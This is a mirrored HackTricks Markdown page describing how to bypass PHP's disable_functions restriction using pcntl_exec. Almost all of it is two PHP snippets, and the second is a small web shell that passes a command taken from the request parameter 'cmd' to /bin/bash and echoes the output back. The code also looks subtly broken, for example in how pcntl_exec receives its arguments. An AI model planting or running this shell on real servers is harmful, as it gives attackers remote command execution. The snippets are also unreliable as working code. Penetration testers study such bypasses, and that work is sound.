mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-10 12:18:52 +00:00
31 lines
653 B
Markdown
31 lines
653 B
Markdown
|
# disable\_functions bypass - PHP 4 >= 4.2.0, PHP 5 pcntl\_exec
|
||
|
|
|
||
|
|
## PHP 4 >= 4.2.0, PHP 5 pcntl\_exec
|
||
|
|
|
||
|
|
From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
|
||
|
|
|
||
|
|
```php
|
||
|
|
<?php
|
||
|
|
$dir = '/var/tmp/';
|
||
|
|
$cmd = 'ls';
|
||
|
|
$option = '-l';
|
||
|
|
$pathtobin = '/bin/bash';
|
||
|
|
|
||
|
|
$arg = array($cmd, $option, $dir);
|
||
|
|
|
||
|
|
pcntl_exec($pathtobin, $arg);
|
||
|
|
echo '123';
|
||
|
|
?>
|
||
|
|
<?php
|
||
|
|
$cmd = @$_REQUEST[cmd];
|
||
|
|
if(function_exists('pcntl_exec')) {
|
||
|
|
$cmd = $cmd."&pkill -9 bash >out";
|
||
|
|
pcntl_exec("/bin/bash", $cmd);
|
||
|
|
echo file_get_contents("out");
|
||
|
|
} else {
|
||
|
|
echo '不支持pcntl扩展';
|
||
|
|
}
|
||
|
|
?>
|
||
|
|
```
|
||
|
|
|